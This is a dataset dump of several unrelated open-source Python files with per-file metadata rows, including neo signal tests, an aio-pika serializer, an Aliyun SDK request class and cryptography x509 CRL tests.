self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
self.assertEqual(self.signal1[9], 9 * pq.mV)
self.assertEqual(result[9], 18 * pq.mV)
assert_array_equal(result.magnitude, self.data1.reshape(-1, 1) * 2)
assert_array_equal(result.times, self.time1quant)
def test__mult_signal_by_const_array_should_preserve_data_complement(self):
result = self.signal1 * np.array(2.)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
self.assertEqual(self.signal1[9], 9 * pq.mV)
self.assertEqual(result[9], 18 * pq.mV)
assert_array_equal(result.magnitude, self.data1.reshape(-1, 1) * 2)
assert_array_equal(result.times, self.time1quant)
def test__divide_signal_by_const_should_preserve_data_complement(self):
result = self.signal1 / 0.5
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
self.assertEqual(self.signal1[9], 9 * pq.mV)
self.assertEqual(result[9], 18 * pq.mV)
assert_array_equal(result.magnitude, self.data1.reshape(-1, 1) / 0.5)
assert_array_equal(result.times, self.time1quant)
@unittest.skipUnless(HAVE_IPYTHON, "requires IPython")
def test__pretty(self):
res = pretty(self.signal1)
signal = self.signal1
targ = (("IrregularlySampledSignal with %d channels of length %d; units %s; datatype %s \n"
"" % (signal.shape[1], signal.shape[0], signal.units.dimensionality.unicode,
signal.dtype))
+ ("name: '%s'\ndescription: '%s'\n" % (signal.name, signal.description))
+ ("annotations: %s\n" % str(signal.annotations))
+ ("sample times: %s" % (signal.times[:10],)))
self.assertEqual(res, targ)
def test__merge(self):
data1 = np.arange(1000.0, 1066.0).reshape((11, 6)) * pq.uV
data2 = np.arange(2.0, 2.033, 0.001).reshape((11, 3)) * pq.mV
times1 = np.arange(11.0) * pq.ms
times2 = np.arange(1.0, 12.0) * pq.ms
arr_ann1 = {'anno1': np.arange(6), 'anno2': ['a', 'b', 'c', 'd', 'e', 'f']}
arr_ann2 = {'anno1': np.arange(100, 103), 'anno3': []}
signal1 = IrregularlySampledSignal(times1, data1, name='signal1',
description='test signal', file_origin='testfile.txt',
array_annotations=arr_ann1)
signal2 = IrregularlySampledSignal(times1, data2, name='signal2',
description='test signal', file_origin='testfile.txt',
array_annotations=arr_ann2)
signal3 = IrregularlySampledSignal(times2, data2, name='signal3',
description='test signal', file_origin='testfile.txt')
with warnings.catch_warnings(record=True) as w:
merged12 = signal1.merge(signal2)
self.assertTrue(len(w) == 1)
self.assertEqual(w[0].category, UserWarning)
self.assertSequenceEqual(str(w[0].message), "The following array annotations were "
"omitted, because they were only present"
" in one of the merged objects: "
"['anno2'] from the one that was merged "
"into and ['anno3'] from the one that "
"was merged into the other")
target_data12 = np.hstack([data1, data2.rescale(pq.uV)])
assert_neo_object_is_compliant(signal1)
assert_neo_object_is_compliant(signal2)
assert_neo_object_is_compliant(merged12)
self.assertAlmostEqual(merged12[5, 0], 1030.0 * pq.uV, 9)
self.assertAlmostEqual(merged12[5, 6], 2015.0 * pq.uV, 9)
self.assertEqual(merged12.name, 'merge(signal1, signal2)')
self.assertEqual(merged12.file_origin, 'testfile.txt')
assert_arrays_equal(merged12.array_annotations['anno1'],
np.array([0, 1, 2, 3, 4, 5, 100, 101, 102]))
self.assertIsInstance(merged12.array_annotations, ArrayDict)
assert_arrays_equal(merged12.magnitude, target_data12)
self.assertRaises(MergeError, signal1.merge, signal3)
class TestAnalogSignalFunctions(unittest.TestCase):
def test__pickle(self):
signal1 = IrregularlySampledSignal(np.arange(10.0) / 100 * pq.s, np.arange(10.0),
units="mV")
fobj = open('./pickle', 'wb')
pickle.dump(signal1, fobj)
fobj.close()
fobj = open('./pickle', 'rb')
try:
signal2 = pickle.load(fobj)
except ValueError:
signal2 = None
assert_array_equal(signal1, signal2)
fobj.close()
os.remove('./pickle')
class TestIrregularlySampledSignalEquality(unittest.TestCase):
def test__signals_with_different_times_should_be_not_equal(self):
signal1 = IrregularlySampledSignal(np.arange(10.0) / 100 * pq.s, np.arange(10.0),
units="mV")
signal2 = IrregularlySampledSignal(np.arange(10.0) / 100 * pq.ms, np.arange(10.0),
units="mV")
self.assertNotEqual(signal1, signal2)
if __name__ == "__main__":
unittest.main()
| 49.063983 | 99 | 0.640326 | 5,565 | 47,543 | 5.277448 | 0.079605 | 0.076101 | 0.069359 | 0.019102 | 0.755933 | 0.72093 | 0.694338 | 0.667711 | 0.637407 | 0.611836 | 0 | 0.037789 | 0.234104 | 47,543 | 968 | 100 | 49.114669 | 0.768764 | 0.02238 | 0 | 0.547194 | 0 | 0 | 0.058299 | 0.004177 | 0 | 0 | 0 | 0 | 0.501276 | 1 | 0.090561 | false | 0 | 0.020408 | 0 | 0.119898 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7c2a8bdac271337f93e880a885f56ed4b95de212 | 1,345 | py | Python | aio_pika/patterns/base.py | homersoft/aio-pika | 7438e4ee86b8944d38907d3042c8d5605d68c81e | [
"Apache-2.0"
] | null | null | null | aio_pika/patterns/base.py | homersoft/aio-pika | 7438e4ee86b8944d38907d3042c8d5605d68c81e | [
"Apache-2.0"
] | null | null | null | aio_pika/patterns/base.py | homersoft/aio-pika | 7438e4ee86b8944d38907d3042c8d5605d68c81e | [
"Apache-2.0"
] | null | null | null | import pickle
from typing import Any, Callable
class Method:
__slots__ = (
"name",
"func",
)
def __init__(self, name: str, func: Callable[..., Any]):
self.name = name
self.func = func
def __getattr__(self, item: str) -> "Method":
return Method(".".join((self.name, item)), func=self.func)
def __call__(self, **kwargs: Any) -> Any:
return self.func(self.name, kwargs=kwargs)
class Proxy:
__slots__ = ("func",)
def __init__(self, func: Callable[..., Any]):
self.func = func
def __getattr__(self, item: str) -> Method:
return Method(item, self.func)
class Base:
SERIALIZER = pickle
CONTENT_TYPE = "application/python-pickle"
def serialize(self, data: Any) -> bytes:
""" Serialize data to the bytes.
Uses `pickle` by default.
You should overlap this method when you want to change serializer
:param data: Data which will be serialized
"""
return self.SERIALIZER.dumps(data)
def deserialize(self, data: bytes) -> Any:
""" Deserialize data from bytes.
Uses `pickle` by default.
You should overlap this method when you want to change serializer
:param data: Data which will be deserialized
"""
return self.SERIALIZER.loads(data)
| 25.377358 | 73 | 0.610409 | 162 | 1,345 | 4.888889 | 0.320988 | 0.060606 | 0.027778 | 0.037879 | 0.388889 | 0.388889 | 0.388889 | 0.388889 | 0.388889 | 0.388889 | 0 | 0 | 0.277323 | 1,345 | 52 | 74 | 25.865385 | 0.814815 | 0.246097 | 0 | 0.074074 | 0 | 0 | 0.047059 | 0.026738 | 0 | 0 | 0 | 0 | 0 | 1 | 0.259259 | false | 0 | 0.074074 | 0.111111 | 0.777778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
7c3050e5fc98b66c7e1fa269352e4262de180b09 | 177 | py | Python | test/todo/domain/test_frequency_db_name.py | MarkStefanovic/todo-api | fb6198511712df853e693787839533f0c9956178 | [
"MIT"
] | null | null | null | test/todo/domain/test_frequency_db_name.py | MarkStefanovic/todo-api | fb6198511712df853e693787839533f0c9956178 | [
"MIT"
] | null | null | null | test/todo/domain/test_frequency_db_name.py | MarkStefanovic/todo-api | fb6198511712df853e693787839533f0c9956178 | [
"MIT"
] | null | null | null | from src import core
if __name__ == "__main__":
n = core.FrequencyDbName.DAILY
assert n == "daily"
print(n)
print(repr(n))
x = core.FrequencyDbName("todo")
| 19.666667 | 36 | 0.632768 | 23 | 177 | 4.521739 | 0.652174 | 0.365385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.231638 | 177 | 8 | 37 | 22.125 | 0.764706 | 0 | 0 | 0 | 0 | 0 | 0.096045 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.285714 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7c33481b6158455cf60525f5ced765bba063e1ba | 447 | py | Python | codestepbystep/count_to_by.py | aleeper/python_sandbox | 2c320e043735f99fac68308fe2692c819cf5a636 | [
"MIT"
] | null | null | null | codestepbystep/count_to_by.py | aleeper/python_sandbox | 2c320e043735f99fac68308fe2692c819cf5a636 | [
"MIT"
] | null | null | null | codestepbystep/count_to_by.py | aleeper/python_sandbox | 2c320e043735f99fac68308fe2692c819cf5a636 | [
"MIT"
] | null | null | null | def get_string_count_to_by(to, by):
if by < 1:
raise ValueError("'by' must be > 0")
if to < 1:
raise ValueError("'to' must be > 0")
if to <= by:
return str(to)
return get_string_count_to_by(to - by, by) + ", " + str(to)
def count_to_by(to, by):
print(get_string_count_to_by(to, by))
def main():
count_to_by(10,1)
count_to_by(34,5)
count_to_by(17,3)
if __name__ == '__main__':
main()
| 21.285714 | 63 | 0.588367 | 78 | 447 | 3.012821 | 0.294872 | 0.204255 | 0.268085 | 0.187234 | 0.429787 | 0.280851 | 0.280851 | 0 | 0 | 0 | 0 | 0.039514 | 0.263982 | 447 | 20 | 64 | 22.35 | 0.674772 | 0 | 0 | 0 | 0 | 0 | 0.09396 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0 | 0 | 0.3125 | 0.0625 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7c3c1e943fef73d42bafa5e9c1b474901c314ea9 | 2,739 | py | Python | aliyun-python-sdk-dms-enterprise/aliyunsdkdms_enterprise/request/v20181101/ListInstancesRequest.py | liumihust/aliyun-openapi-python-sdk | c7b5dd4befae4b9c59181654289f9272531207ef | [
"Apache-2.0"
] | null | null | null | aliyun-python-sdk-dms-enterprise/aliyunsdkdms_enterprise/request/v20181101/ListInstancesRequest.py | liumihust/aliyun-openapi-python-sdk | c7b5dd4befae4b9c59181654289f9272531207ef | [
"Apache-2.0"
] | 1 | 2020-05-31T14:51:47.000Z | 2020-05-31T14:51:47.000Z | aliyun-python-sdk-dms-enterprise/aliyunsdkdms_enterprise/request/v20181101/ListInstancesRequest.py | liumihust/aliyun-openapi-python-sdk | c7b5dd4befae4b9c59181654289f9272531207ef | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkdms_enterprise.endpoint import endpoint_data
class ListInstancesRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'dms-enterprise', '2018-11-01', 'ListInstances','dmsenterprise')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_SearchKey(self):
return self.get_query_params().get('SearchKey')
def set_SearchKey(self,SearchKey):
self.add_query_param('SearchKey',SearchKey)
def get_Tid(self):
return self.get_query_params().get('Tid')
def set_Tid(self,Tid):
self.add_query_param('Tid',Tid)
def get_InstanceState(self):
return self.get_query_params().get('InstanceState')
def set_InstanceState(self,InstanceState):
self.add_query_param('InstanceState',InstanceState)
def get_PageNumber(self):
return self.get_query_params().get('PageNumber')
def set_PageNumber(self,PageNumber):
self.add_query_param('PageNumber',PageNumber)
def get_NetType(self):
return self.get_query_params().get('NetType')
def set_NetType(self,NetType):
self.add_query_param('NetType',NetType)
def get_DbType(self):
return self.get_query_params().get('DbType')
def set_DbType(self,DbType):
self.add_query_param('DbType',DbType)
def get_EnvType(self):
return self.get_query_params().get('EnvType')
def set_EnvType(self,EnvType):
self.add_query_param('EnvType',EnvType)
def get_InstanceSource(self):
return self.get_query_params().get('InstanceSource')
def set_InstanceSource(self,InstanceSource):
self.add_query_param('InstanceSource',InstanceSource)
def get_PageSize(self):
return self.get_query_params().get('PageSize')
def set_PageSize(self,PageSize):
self.add_query_param('PageSize',PageSize) | 32.223529 | 92 | 0.758306 | 370 | 2,739 | 5.424324 | 0.310811 | 0.026906 | 0.06278 | 0.076233 | 0.139013 | 0.139013 | 0.139013 | 0 | 0 | 0 | 0 | 0.005068 | 0.135451 | 2,739 | 85 | 93 | 32.223529 | 0.842483 | 0.275283 | 0 | 0 | 0 | 0 | 0.136958 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.422222 | false | 0 | 0.044444 | 0.2 | 0.688889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
7c4493dcbfca95c195eb7212d69f702245111712 | 620 | py | Python | uds/utilities/__init__.py | mdabrowski1990/uds | 1aee0c1de446ee3dd461706949504f2c218db1e8 | [
"MIT"
] | 18 | 2021-03-28T22:39:18.000Z | 2022-02-13T21:50:37.000Z | uds/utilities/__init__.py | mdabrowski1990/uds | 1aee0c1de446ee3dd461706949504f2c218db1e8 | [
"MIT"
] | 153 | 2021-02-09T09:27:05.000Z | 2022-03-29T06:09:15.000Z | uds/utilities/__init__.py | mdabrowski1990/uds | 1aee0c1de446ee3dd461706949504f2c218db1e8 | [
"MIT"
] | 1 | 2021-05-13T16:01:46.000Z | 2021-05-13T16:01:46.000Z | """Various helper functions, classes and variables that are shared and reused within the project."""
from .enums import ValidatedEnum, ExtendableEnum, ByteEnum, NibbleEnum
from .common_types import Nibble, RawByte, RawBytes, RawBytesTuple, RawBytesList, RawBytesSet, \
validate_nibble, validate_raw_bytes, validate_raw_byte, \
TimeMilliseconds
from .bytes_operations import Endianness, EndiannessAlias, int_to_bytes_list, bytes_list_to_int
from .custom_exceptions import ReassignmentError, InconsistentArgumentsError, AmbiguityError, \
UnusedArgumentError
from .custom_warnings import UnusedArgumentWarning
| 56.363636 | 100 | 0.835484 | 67 | 620 | 7.507463 | 0.701493 | 0.043738 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109677 | 620 | 10 | 101 | 62 | 0.911232 | 0.151613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.625 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
7c45660fbf28183fb31bd82bbfed828e456a6d37 | 187,644 | py | Python | tests/x509/test_x509.py | mattsb42-aws/cryptography | e687b8f7f40e30ef88e9de889c55cd7fdec99762 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 2 | 2021-01-30T13:23:54.000Z | 2021-06-07T21:35:19.000Z | tests/x509/test_x509.py | mattsb42-aws/cryptography | e687b8f7f40e30ef88e9de889c55cd7fdec99762 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 7 | 2019-11-28T21:48:38.000Z | 2020-08-02T18:06:40.000Z | tests/x509/test_x509.py | mattsb42-aws/cryptography | e687b8f7f40e30ef88e9de889c55cd7fdec99762 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 6 | 2020-05-29T21:46:30.000Z | 2020-12-15T20:32:19.000Z | # -*- coding: utf-8 -*-
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import binascii
import collections
import datetime
import ipaddress
import os
import pytest
import pytz
import six
from cryptography import utils, x509
from cryptography.exceptions import UnsupportedAlgorithm
from cryptography.hazmat._der import (
BIT_STRING, CONSTRUCTED, CONTEXT_SPECIFIC, DERReader, GENERALIZED_TIME,
INTEGER, OBJECT_IDENTIFIER, PRINTABLE_STRING, SEQUENCE, SET, UTC_TIME
)
from cryptography.hazmat.backends.interfaces import (
DSABackend, EllipticCurveBackend, RSABackend, X509Backend
)
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import (
dsa, ec, ed25519, ed448, padding, rsa
)
from cryptography.hazmat.primitives.asymmetric.utils import (
decode_dss_signature
)
from cryptography.x509.name import _ASN1Type
from cryptography.x509.oid import (
AuthorityInformationAccessOID, ExtendedKeyUsageOID, ExtensionOID,
NameOID, SignatureAlgorithmOID
)
from ..hazmat.primitives.fixtures_dsa import DSA_KEY_2048
from ..hazmat.primitives.fixtures_ec import EC_KEY_SECP256R1
from ..hazmat.primitives.fixtures_rsa import RSA_KEY_2048, RSA_KEY_512
from ..hazmat.primitives.test_ec import _skip_curve_unsupported
from ..utils import load_vectors_from_file
@utils.register_interface(x509.ExtensionType)
class DummyExtension(object):
oid = x509.ObjectIdentifier("1.2.3.4")
@utils.register_interface(x509.GeneralName)
class FakeGeneralName(object):
def __init__(self, value):
self._value = value
value = utils.read_only_property("_value")
def _load_cert(filename, loader, backend):
cert = load_vectors_from_file(
filename=filename,
loader=lambda pemfile: loader(pemfile.read(), backend),
mode="rb"
)
return cert
ParsedCertificate = collections.namedtuple(
"ParsedCertificate",
["not_before_tag", "not_after_tag", "issuer", "subject"]
)
def _parse_cert(der):
# See the Certificate structured, defined in RFC 5280.
with DERReader(der).read_single_element(SEQUENCE) as cert:
tbs_cert = cert.read_element(SEQUENCE)
# Skip outer signature algorithm
_ = cert.read_element(SEQUENCE)
# Skip signature
_ = cert.read_element(BIT_STRING)
with tbs_cert:
# Skip version
_ = tbs_cert.read_optional_element(CONTEXT_SPECIFIC | CONSTRUCTED | 0)
# Skip serialNumber
_ = tbs_cert.read_element(INTEGER)
# Skip inner signature algorithm
_ = tbs_cert.read_element(SEQUENCE)
issuer = tbs_cert.read_element(SEQUENCE)
validity = tbs_cert.read_element(SEQUENCE)
subject = tbs_cert.read_element(SEQUENCE)
# Skip subjectPublicKeyInfo
_ = tbs_cert.read_element(SEQUENCE)
# Skip issuerUniqueID
_ = tbs_cert.read_optional_element(CONTEXT_SPECIFIC | CONSTRUCTED | 1)
# Skip subjectUniqueID
_ = tbs_cert.read_optional_element(CONTEXT_SPECIFIC | CONSTRUCTED | 2)
# Skip extensions
_ = tbs_cert.read_optional_element(CONTEXT_SPECIFIC | CONSTRUCTED | 3)
with validity:
not_before_tag, _ = validity.read_any_element()
not_after_tag, _ = validity.read_any_element()
return ParsedCertificate(
not_before_tag=not_before_tag,
not_after_tag=not_after_tag,
issuer=issuer,
subject=subject,
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestCertificateRevocationList(object):
def test_load_pem_crl(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)
assert isinstance(crl, x509.CertificateRevocationList)
fingerprint = binascii.hexlify(crl.fingerprint(hashes.SHA1()))
assert fingerprint == b"3234b0cb4c0cedf6423724b736729dcfc9e441ef"
assert isinstance(crl.signature_hash_algorithm, hashes.SHA256)
assert (
crl.signature_algorithm_oid ==
SignatureAlgorithmOID.RSA_WITH_SHA256
)
def test_load_der_crl(self, backend):
crl = _load_cert(
os.path.join("x509", "PKITS_data", "crls", "GoodCACRL.crl"),
x509.load_der_x509_crl,
backend
)
assert isinstance(crl, x509.CertificateRevocationList)
fingerprint = binascii.hexlify(crl.fingerprint(hashes.SHA1()))
assert fingerprint == b"dd3db63c50f4c4a13e090f14053227cb1011a5ad"
assert isinstance(crl.signature_hash_algorithm, hashes.SHA256)
def test_invalid_pem(self, backend):
with pytest.raises(ValueError):
x509.load_pem_x509_crl(b"notacrl", backend)
def test_invalid_der(self, backend):
with pytest.raises(ValueError):
x509.load_der_x509_crl(b"notacrl", backend)
def test_unknown_signature_algorithm(self, backend):
crl = _load_cert(
os.path.join(
"x509", "custom", "crl_md2_unknown_crit_entry_ext.pem"
),
x509.load_pem_x509_crl,
backend
)
with pytest.raises(UnsupportedAlgorithm):
crl.signature_hash_algorithm()
def test_issuer(self, backend):
crl = _load_cert(
os.path.join("x509", "PKITS_data", "crls", "GoodCACRL.crl"),
x509.load_der_x509_crl,
backend
)
assert isinstance(crl.issuer, x509.Name)
assert list(crl.issuer) == [
x509.NameAttribute(x509.OID_COUNTRY_NAME, u'US'),
x509.NameAttribute(
x509.OID_ORGANIZATION_NAME, u'Test Certificates 2011'
),
x509.NameAttribute(x509.OID_COMMON_NAME, u'Good CA')
]
assert crl.issuer.get_attributes_for_oid(x509.OID_COMMON_NAME) == [
x509.NameAttribute(x509.OID_COMMON_NAME, u'Good CA')
]
def test_equality(self, backend):
crl1 = _load_cert(
os.path.join("x509", "PKITS_data", "crls", "GoodCACRL.crl"),
x509.load_der_x509_crl,
backend
)
crl2 = _load_cert(
os.path.join("x509", "PKITS_data", "crls", "GoodCACRL.crl"),
x509.load_der_x509_crl,
backend
)
crl3 = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)
assert crl1 == crl2
assert crl1 != crl3
assert crl1 != object()
def test_update_dates(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)
assert isinstance(crl.next_update, datetime.datetime)
assert isinstance(crl.last_update, datetime.datetime)
assert crl.next_update.isoformat() == "2016-01-01T00:00:00"
assert crl.last_update.isoformat() == "2015-01-01T00:00:00"
def test_revoked_cert_retrieval(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)
for r in crl:
assert isinstance(r, x509.RevokedCertificate)
# Check that len() works for CRLs.
assert len(crl) == 12
def test_get_revoked_certificate_by_serial_number(self, backend):
crl = _load_cert(
os.path.join(
"x509", "PKITS_data", "crls", "LongSerialNumberCACRL.crl"),
x509.load_der_x509_crl,
backend
)
serial_number = 725064303890588110203033396814564464046290047507
revoked = crl.get_revoked_certificate_by_serial_number(serial_number)
assert revoked.serial_number == serial_number
assert crl.get_revoked_certificate_by_serial_number(500) is None
def test_revoked_cert_retrieval_retain_only_revoked(self, backend):
"""
This test attempts to trigger the crash condition described in
https://github.com/pyca/cryptography/issues/2557
PyPy does gc at its own pace, so it will only be reliable on CPython.
"""
revoked = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)[11]
assert revoked.revocation_date == datetime.datetime(2015, 1, 1, 0, 0)
assert revoked.serial_number == 11
def test_extensions(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_ian_aia_aki.pem"),
x509.load_pem_x509_crl,
backend
)
crl_number = crl.extensions.get_extension_for_oid(
ExtensionOID.CRL_NUMBER
)
aki = crl.extensions.get_extension_for_class(
x509.AuthorityKeyIdentifier
)
aia = crl.extensions.get_extension_for_class(
x509.AuthorityInformationAccess
)
ian = crl.extensions.get_extension_for_class(
x509.IssuerAlternativeName
)
assert crl_number.value == x509.CRLNumber(1)
assert crl_number.critical is False
assert aki.value == x509.AuthorityKeyIdentifier(
key_identifier=(
b'yu\xbb\x84:\xcb,\xdez\t\xbe1\x1bC\xbc\x1c*MSX'
),
authority_cert_issuer=None,
authority_cert_serial_number=None
)
assert aia.value == x509.AuthorityInformationAccess([
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.DNSName(u"cryptography.io")
)
])
assert ian.value == x509.IssuerAlternativeName([
x509.UniformResourceIdentifier(u"https://cryptography.io"),
])
def test_delta_crl_indicator(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_delta_crl_indicator.pem"),
x509.load_pem_x509_crl,
backend
)
dci = crl.extensions.get_extension_for_oid(
ExtensionOID.DELTA_CRL_INDICATOR
)
assert dci.value == x509.DeltaCRLIndicator(12345678901234567890)
assert dci.critical is False
def test_signature(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)
assert crl.signature == binascii.unhexlify(
b"536a5a0794f68267361e7bc2f19167a3e667a2ab141535616855d8deb2ba1af"
b"9fd4546b1fe76b454eb436af7b28229fedff4634dfc9dd92254266219ae0ea8"
b"75d9ff972e9a2da23d5945f073da18c50a4265bfed9ca16586347800ef49dd1"
b"6856d7265f4f3c498a57f04dc04404e2bd2e2ada1f5697057aacef779a18371"
b"c621edc9a5c2b8ec1716e8fa22feeb7fcec0ce9156c8d344aa6ae8d1a5d99d0"
b"9386df36307df3b63c83908f4a61a0ff604c1e292ad63b349d1082ddd7ae1b7"
b"c178bba995523ec6999310c54da5706549797bfb1230f5593ba7b4353dade4f"
b"d2be13a57580a6eb20b5c4083f000abac3bf32cd8b75f23e4c8f4b3a79e1e2d"
b"58a472b0"
)
def test_tbs_certlist_bytes(self, backend):
crl = _load_cert(
os.path.join("x509", "PKITS_data", "crls", "GoodCACRL.crl"),
x509.load_der_x509_crl,
backend
)
ca_cert = _load_cert(
os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
x509.load_der_x509_certificate,
backend
)
ca_cert.public_key().verify(
crl.signature, crl.tbs_certlist_bytes,
padding.PKCS1v15(), crl.signature_hash_algorithm
)
def test_public_bytes_pem(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_empty.pem"),
x509.load_pem_x509_crl,
backend
)
# Encode it to PEM and load it back.
crl = x509.load_pem_x509_crl(crl.public_bytes(
encoding=serialization.Encoding.PEM,
), backend)
assert len(crl) == 0
assert crl.last_update == datetime.datetime(2015, 12, 20, 23, 44, 47)
assert crl.next_update == datetime.datetime(2015, 12, 28, 0, 44, 47)
def test_public_bytes_der(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)
# Encode it to DER and load it back.
crl = x509.load_der_x509_crl(crl.public_bytes(
encoding=serialization.Encoding.DER,
), backend)
assert len(crl) == 12
assert crl.last_update == datetime.datetime(2015, 1, 1, 0, 0, 0)
assert crl.next_update == datetime.datetime(2016, 1, 1, 0, 0, 0)
@pytest.mark.parametrize(
("cert_path", "loader_func", "encoding"),
[
(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
serialization.Encoding.PEM,
),
(
os.path.join("x509", "PKITS_data", "crls", "GoodCACRL.crl"),
x509.load_der_x509_crl,
serialization.Encoding.DER,
),
]
)
def test_public_bytes_match(self, cert_path, loader_func, encoding,
backend):
crl_bytes = load_vectors_from_file(
cert_path, lambda pemfile: pemfile.read(), mode="rb"
)
crl = loader_func(crl_bytes, backend)
serialized = crl.public_bytes(encoding)
assert serialized == crl_bytes
def test_public_bytes_invalid_encoding(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_empty.pem"),
x509.load_pem_x509_crl,
backend
)
with pytest.raises(TypeError):
crl.public_bytes('NotAnEncoding')
def test_verify_bad(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "invalid_signature.pem"),
x509.load_pem_x509_crl,
backend
)
crt = _load_cert(
os.path.join("x509", "custom", "invalid_signature.pem"),
x509.load_pem_x509_certificate,
backend
)
assert not crl.is_signature_valid(crt.public_key())
